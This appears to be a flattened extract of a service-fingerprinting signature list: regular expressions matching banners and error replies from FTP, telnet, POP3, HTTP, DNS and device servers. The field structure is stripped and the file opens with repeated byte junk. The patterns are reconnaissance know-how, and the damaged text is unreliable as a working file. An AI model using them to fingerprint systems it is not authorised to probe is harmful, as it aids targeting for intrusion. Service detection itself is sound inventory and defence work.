}%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e +\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e +-=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n +503 Service Unavailable\r\n\r\n\0 +Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> +HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n +\0\0\0\x04Z(\d)([1-9]\d) +Invalid request string: Request string is: \"\r\" +Feedback\nError=You need unique ID to command ABC! +#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} +-\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 +\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff +\0\0\0\0\0\0\0\x08 +\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n +Unknown command\r\n +Can't fork pty, bye!\n +Message received\n +Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter +Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: +\r\nEnter your account name and password\.\r\n\r\nUsername: +\n\x03 +unrecognized op\n\x03 +\nunrecognized op\n\n\x03 +\n(\d+)\n(\d+)\n(\d+) +\xc0\0\x01\0....\0\0\0\x03 +200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n +\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n +Idle\r\n +UNKNOWN COMMAND\n +_err=refused%20by%20workers\r\n +ok\r\nunknown command\r\nunknown command\r\n +Expecting SSL \(optional\) and CONFIG as first commands\.\n +X01\r\nX01\r\n +Invalid FT GWADDR / START protocol\n +\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n +Finger online user list request denied\.\r\n +Username Real name Idletime TTY Remote console location\n +Login Name Tty Idle Login Time Office Office Phone\r\n +\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n +This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n +\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n +finger: /var/adm/lastlog open error\nNo one logged on\r\n +Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. +\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n +MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: +220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n +520 invalid command\n +\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 +220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n +220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n +220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n +220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n +220 OK\n226 OK\n +220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n +220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n +220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n +220 ps2ftpd ready\.\r\n500 Not understood\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: +\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd +FlashCONNECT ([\d.]+) invalid message\.\n +\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\nBad connect string! +{type INIT} {up \d+} {auth \d+} {name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n +\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 +HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. +HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n +HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n +0, 0: ERROR: UNKNOWN-ERROR\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +0 , 0 : ERROR : INVALID-PORT\r\n + : ERROR : UNKNOWN-ERROR\r\n +0, 0 : ERROR : X-INVALID-REQUEST\r\n +0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n +0, 0 : ERROR : INVALID-PORT\r\n +0,0 : ERROR : INVALID-PORT\r\n +0 , 0 : ERROR :INVALID-PORT\r\n + : USERID : UNIX : ([-\w_]+) + : USERID : UNIX : [a-z]{4,8}\r\n +1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n +, : USERID : UNIX : [^\r\n]+\r\n +\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n +ERR password required\r\nERR password required\r\n +ERR administrator password required\r\nERR administrator password required\r\n + \r\nSorry, that nickname format is invalid\.\r\r\n +:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n +\+OK \r\n-ERR XXX authorization first\r\n +HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n +ERROR: Command doesn't seem to be followed by a space followed by arguments\n +.\x08\0\0 +500 access denied: Check networking/linuxconf network access\r\n +BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n +\x02\x02 +ERROR\r\nERROR\r\n +\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERROR: Unknown request number\. +ERROR: Invalid password\.\nERROR: Invalid password\.\n +HP OpenView OmniBack II ([-.\w]+): INET, +\0\0\xfa\xda\0\x02 +598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server +\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n +\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n +\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 +\+OK pop server ready\r\n +\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n +-ERR Invalid command\.\r\n-ERR Invalid command\.\r\n +\+OK POP3 ready\r\n-ERR invalid command\r\n +\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n +\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n +EInvalid packet length\0 +EFATAL 1: invalid length of startup packet\n\0 +\xff +\xc0\0\x12Data field missing +\xff\x17Access to unopened port. +Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n +\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +ERR 27 +\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 +\x05\x01\0.\0\0\0\0\0\0 +\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP +SPAMD/1\.0 76 Bad header line: \r\n +ERHD +\x01\0\0\0 +SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 +\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer +\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: +514 Authentication required\.\r\n +login: Password: Login incorrect\. +login: uucpd: \d+-\d+ The user is not known\.\n +%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n +% No entries found for the selected source\(s\)\.\n +128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n +\x02\x01 +SDPACK +\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n +\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: +\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy +\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n +\xff\xfb\x01Login: \r\nLogin: \r\nLogin: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: +\xff\xfb\x01\n\r-> \n\r-> \n\r-> +bad password\r\n +\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: +\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n +\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: +\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\r\nPress return:\*\*\*\*\r\nEnter Password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server +\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n +\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( +\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: + 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n +User Name: \r\r\nPassword: \r\r\nRemote MAC address: +\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) +\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: +\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: +\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n +\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n +\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> +\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request + 501 Not Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n + 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n +HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n + 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n +HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n +HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n +0\x82\x01\n\x02\x82\x01\x01\0 +HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n +\xff\xff\xfb& +Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n +sh-2\.05b\ +WTAM/1\.0 401 Unrecognized Command\n\n +Command Shell\r\n\r\n% \r\n% +201- connected\r\n407- unknown command\r\n +HELLO XBOX! +ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED +\*\*\x18B0100000023be50\r\x8a\x11 +<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n +(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n +\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 +:[-\w_.]+ 451 GET :\r\n +\n\nDirectory /\n\n\n\n

Directory listing of /

+Nice try\.\.\.\r\n +HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n +HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n +\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 +=\0\0\0 +Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n +Login name: GET \t\t\tIn real life: \?\?\?\r\n + +-;;=\n +\.;M####\+\n +User not found\r\n +EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n +Login name: HTTP/1\.0 In real life: \?\?\?\r\n +3That item is not currently available\.\r\n +\0\0\0\0/\x20HT +HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document +HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n +HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n +HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n +HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n +HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) +HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n +HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. +HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n +HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n +HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n +HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager +HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n +HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page +:Default-Chat-Community 421 \* GET :Unknown command\r\n +:([-\w_.]+) 451 :You have not registered your connection\r\n +<\?xml version='1\.0'\?> +Invalid XML +Invalid XML +<\?xml version='1\.0' encoding='UTF-8'\?>\n\n +JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n +\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f +ERR unknown_command Unknown\+server\+command\r\n +..\x0a\0x\x01 +ERROR\n +1INVALID REQUEST +\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP +SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +-ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n +-ERR Fatal error: pop3s: required OpenSSL options not present\r\n +EFATAL: invalid length of startup packet\n\0 +action=dunno\n\n +-ERR wrong number of arguments for 'get' command\r\n +0 serverclose 0\n +HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n +HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n +ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) +HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: +\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n +HTTP/1\.0 503 Directory busy, try again later\r\n\r\n +HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n +HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n +login: Login incorrect\. +HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n +HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 +\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n +\x01\0\0\0\x02\0\0 + +HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n +HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n +HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n +\x10\x1a\x0b\x00\x60\x4d +HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error +\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n +RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request +RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n +RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n +HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n +(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. +\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 +\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 +\x01Permission denied\.\n +\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError +\x16\x15\x16\x16\x16\x12XW\] +\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... +\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c +\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( +\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +\x01Login incorrect\.\n +\x01rexecd: Login incorrect.?\n +\x01rexecd: [-\d]+ Connexion incorrecte\.\n +\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 +\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 +\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 